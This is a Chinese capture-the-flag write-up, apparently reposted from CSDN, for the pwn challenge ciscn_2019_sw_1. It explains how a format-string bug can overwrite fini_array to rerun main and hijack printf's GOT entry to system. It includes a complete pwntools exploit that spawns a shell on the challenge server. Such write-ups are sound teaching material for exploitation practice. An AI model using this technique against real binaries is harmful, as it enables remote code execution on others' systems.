ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)

2021-11-13 13:00:17  阅读:276  来源: 互联网

标签:ciscn libc fmt sw fini got array data lambda


ciscn_2019_sw_1:

请添加图片描述
主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9
先引用下:

  • 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;
  • 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;
  • 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
  • 程序在加载的时候,会依次调用init.array数组中的每一个函数指针,在结束的时候,依次调用fini.array中的每一个函数指针
  • 当程序出现格式化字符串漏洞,但是需要写两次才能完成攻击,这个时候可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。一般来说,这个数组的长度为1,也就是说只能写一个地址。

程序分析:

这边有个格式化字符串漏洞,长度限制64
请添加图片描述

大致步骤:

我们用格式字符串漏洞改写fini_array为main的地址,改写print_got为system_plt
(改写fini_array为main,就能无限循环
改写print_got为system_plt在第二次main填入/bin/sh就能getshell)

exp:

from pwn import *
local_file  = './ciscn_2019_sw_1'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26724 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
def debug(cmd=''):
     gdb.attach(r,cmd)
#-----------------------------
_sys=0x804851b
command=0x08048640
system_plt=0x080483D0
fini_array0=0x0804979c
main=0x8048534
printf_got=0x0804989C
offest=4
payload=p32(printf_got+2)+p32(fini_array0+2)+p32(printf_got)+p32(fini_array0)
payload+='%'+str(0x0804-0x10)+'c%4$hn'+'%5$hn'+'%'+str(0x83d0-0x0804)+'c%6$hn'+'%'+str(0x8534-0x83d0)+'c%7$hn'
sla('Welcome to my ctf! What\'s your name?\n',payload)
sl('/bin/sh\x00')
#debug()
r.interactive()

其他:

记一下怎么找fini_array的地址
在这里插入图片描述
在这里插入图片描述
或者用
elf.sym[’__init_array_end’]
请添加图片描述

标签:ciscn,libc,fmt,sw,fini,got,array,data,lambda
来源: https://blog.csdn.net/m0_51251108/article/details/121302556

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有